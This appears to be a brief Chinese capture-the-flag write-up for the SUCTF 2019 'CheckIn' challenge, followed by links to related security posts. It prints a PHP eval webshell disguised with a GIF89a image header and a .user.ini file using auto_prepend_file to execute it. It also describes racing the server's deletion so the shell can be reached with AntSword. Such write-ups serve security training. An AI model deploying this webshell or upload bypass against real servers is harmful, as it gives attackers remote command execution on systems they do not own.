[SUCTF 2019]CheckIn 1

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>
  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
黑客Ash8 小时前
【D01】网络安全概论
网络·安全·web安全·php
.Ayang9 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang9 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
网络安全-老纪10 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
Mr.Pascal11 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
dot.Net安全矩阵12 小时前
.NET 通过模块和驱动收集本地EDR的工具
windows·安全·web安全·.net·交互
Hacker_Oldv13 小时前
网络安全的学习路线
学习·安全·web安全
黑客Ash13 小时前
计算机中的网络安全
网络·安全·web安全
恃宠而骄的佩奇14 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯